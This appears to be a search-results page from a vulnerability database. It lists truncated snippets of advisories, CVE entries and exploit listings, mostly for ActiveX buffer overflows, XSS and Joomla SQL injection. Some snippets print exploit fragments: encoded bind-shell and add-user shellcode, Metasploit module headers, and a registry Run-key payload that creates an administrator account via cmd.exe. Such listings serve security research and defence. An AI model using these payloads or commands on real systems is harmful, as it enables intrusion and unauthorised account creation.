70 matches found
J-Integra v2. 1 1 remote code execution vulnerability-vulnerability warning-the black bar safety net
J-Integra is a powerful, enables Java and COM, and J2EE, and. NET compatible middleware. J-Integra is divided into J-Integra for COM, J-Integra for . NET and J-Integra for Exchange of three partial products. J-Integra v2. 1 1 A control in the presence of a remote code execution vulnerability that...
MOXA MediaDBPlayback ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in MOXAActiveXSDK. When sending an overly long string to the PlayFileName of MediaDBPlayback.DLL 2.2.0.5 an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Unfixed Redirect vulnerability at phome.net
Security researcher Wong Chieh Yie, has submitted on 09/11/2010 a Redirect vulnerability affecting phome.net, which at the time of submission ranked 6559 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed. If yo...
Akamai Download Manager arbitrary file download & execution
------------------------------------------------------------------------ Akamai Download Manager arbitrary file download & execution ------------------------------------------------------------------------ Yorick Koster, April 2009...
Image22 1.1.1 Buffer Overflow
' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in surgeftpmgr.cgi in NetWin SurgeFTP 2.3a6 allow remote attackers to inject arbitrary web script or HTML via the 1 domainid or 2 classid parameter in a class action...
CVE-2010-1068
The CVE-2010-1068 entry describes multiple cross-site scripting (XSS) vulnerabilities in SurgeFTP 2.3a6, specifically in surgeftpmgr.cgi. The issue enables remote attackers to inject arbitrary web script or HTML via the domainid or classid parameters in a class action. Connected sources identify ...
CVE-2010-1068
Multiple cross-site scripting XSS vulnerabilities in surgeftpmgr.cgi in NetWin SurgeFTP 2.3a6 allow remote attackers to inject arbitrary web script or HTML via the 1 domainid or 2 classid parameter in a class action...
Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)
Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow Denial of Service Exploit Title: Rising Online Virus Scanner ActiveX Control DoS Stack overflow Author: wirebonder Software Link: http://www.rising-global.com/products/online-scanner-intro.html Tested on: Windows XP sp3 ProgID:...
Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
msvidctlmpeg2.rb Microsoft DirectShow msvidctl.dll MPEG-2 Memory Corruption exploit for the Metasploit Framework Tested successfully on the following platforms fully patched 06/07/09: - Internet Explorer 6, Windows XP SP2 - Internet Explorer 7, Windows XP SP3 Original exploit was found in-the-wil...
Autodesk IDrop ActiveX Control Heap Memory Corruption
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Autodesk IDrop ActiveX Control Heap Memory Corruption', 'Description' = %q This module exploits a heap-based memory corruption...
AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x WindsPly.ocx v3.6.0.0. This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code...
EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability
No description provided by source. !-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object emsmtp.dll 6.0.1 remote buffer overflow exploit ie6 / xp sp2 version passing more than 539 chars to SubmitToExpress method: EAX 00000400 ECX 0013DD24 ASCII "Error Creating File: AAAA ... EDX C0403FFF...
Sql injection
SQL injection vulnerability in the ComSchool comschool component 1.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the classid parameter in a showclass action to index.php...
CVE-2009-2014
SQL injection vulnerability in the ComSchool comschool component 1.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the classid parameter in a showclass action to index.php...
Joomla! Component com_school 1.4 - 'classid' SQL Injection
---------------------------------------------------------------------- Joomla Component comschool classid SQL injection Vulnerability ---------------------------------------------------------------------- + Author : Chip D3 Bi0s + Email : chipdebiosalt+64gmail.com + Group : LatinHackTeam +...
AOL IWinAmpActiveX Class - ConvertFile() Remote Buffer Overflow
AOL IWinAmpActiveX Class - ConvertFile Remote Buffer Overflow //add user one, user "sun" pass "tzu" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...
ppmate-dospoc.txt
arg1=String10000, "A" target.StartURLarg1...
Telecom Italy Alice Messenger - Remote Registry Key Manipulation
Telecom Italy Alice Messenger - Remote Registry Key Manipulation group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config...
postcast-overflow.txt
'open calc.exe scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%...